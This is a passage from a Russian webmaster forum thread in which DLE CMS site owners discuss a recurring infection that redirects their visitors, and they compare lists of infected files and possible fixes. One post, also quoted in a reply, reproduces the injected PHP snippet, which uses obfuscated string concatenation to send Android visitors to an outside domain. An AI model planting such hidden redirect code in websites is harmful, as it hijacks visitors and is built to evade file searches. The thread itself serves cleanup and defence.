Форум Сайтостроение Безопасность

Вирус на сайте cms dle

1... 333435363738394041 ...61
Ким_иррр
На сайте с 19.12.2011
Offline
79
Ким_иррр
#361
EdGein:
Сегодня нашел эту дрянь в language/Russian/website.lng. Проверь у себя.

да там была эта хрень, перед этим я все файлы проверил, убрал но ничего не изменилось

B
На сайте с 07.05.2011
Offline
18
badu
#362
Ким_иррр:
да там была эта хрень, перед этим я все файлы проверил, убрал но ничего не изменилось

Значит у вас "дыра" до сих пор не прикрыта, читайте ветку, там выше есть решение

nop
trahtor
На сайте с 06.12.2005
Offline
426
trahtor
#363

Мда, печаль. На одном варезнеке начал КИС орать, начал копать - почти все сайты на линейке дле 9.x с мобильным редиректом. Долгая ночка будет :(

V2
На сайте с 05.01.2012
Offline
120
Vitaly2012
#364
badu:
Значит у вас "дыра" до сих пор не прикрыта, читайте ветку, там выше есть решение

Скопируйте решение еще разок, там много чего написано.

Robinzonchik
На сайте с 14.07.2010
Offline
55
Robinzonchik
#365

В январе был редирект на statuses.ws. Удалил последствия.

Сейчас он снова появился.

+ к нему такой изврат:


if(strchr($_SERVER['H'.'TTP_'.'US'.'ER_A'.'GE'.'NT'],'An'.'dr'.'oid'))
{header('Loc'.'ation: ht'.'tp:/'.'/ref'.'resh-b'.'rowse'.'r.00'.'xf'.'f.net/');die();}

Видемо сделали специально, чтобы по location, android в файлах не искался.

Список зараженных файлов:

/engine/data/config.php
/engine/data/dbconfig.php
/engine/init.php
/engine/engine.php
/engine/modules/functions.php
/index.php
/language/Russian/website.lng

Послушал совета badu, посмотрим, что дальше будет.

Так же заметил ещё вот эту фигню(http://pastebin.com/wjG6ZNe1) в index.php

Пишу программы, сайты, сервисы, скрипты. (/ru/forum/819250)
Вирус на сайте Требуется написать скрипт clickunder'a Вопрос по редиректу
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#366
Robinzonchik:
В январе был редирект на statuses.ws. Удалил последствия.
Сейчас он снова появился.
+ к нему такой изврат: 

if(strchr($_SERVER['H'.'TTP_'.'US'.'ER_A'.'GE'.'NT'],'An'.'dr'.'oid'))

{header('Loc'.'ation: ht'.'tp:/'.'/ref'.'resh-b'.'rowse'.'r.00'.'xf'.'f.net/');die();}

Видемо сделали специально, чтобы по location, android в файлах не искался.
Список зараженных файлов:

Послушал совета badu, посмотрим, что дальше будет.

Так же заметил ещё вот эту фигню(http://pastebin.com/wjG6ZNe1) в index.php

Патчи безопасности не помогают? Много модулей установлено? Ай-болит подозрительного не показывает?

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
B
На сайте с 14.07.2010
Offline
55
Bezlim
#367

позавчера взломали 2 сайта, поставили редирект с поисковых систем, вчера сменил движок к ДЛЕ 9.8, сегодня ночью один из двух сайтов снова взломали

Robinzonchik
На сайте с 14.07.2010
Offline
55
Robinzonchik
#368
kgtu5:
Патчи безопасности не помогают? Много модулей установлено? Ай-болит подозрительного не показывает?

Патчи не ставил. DLE 9.2.

Модулей нет.

Ай-болитом не проверял.

vlad00777
На сайте с 24.12.2009
Offline
119
vlad00777
#369

У меня проблем уже нет. Времени достаточно уже прошло.

Верстка. Качественно! Адаптивная, резиновая, с параллаксом и прочими плюшками. В ЛС.
K
На сайте с 05.05.2011
Offline
44
karppa
#370
vlad00777:
У меня проблем уже нет. Времени достаточно уже прошло.

а что именно помогло? можете написать все комплексные мероприятия, которые Вы сделали с Вашим сайтом...

Ремонт онлайн (http://remont-online.net/)
1... 333435363738394041 ...61

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий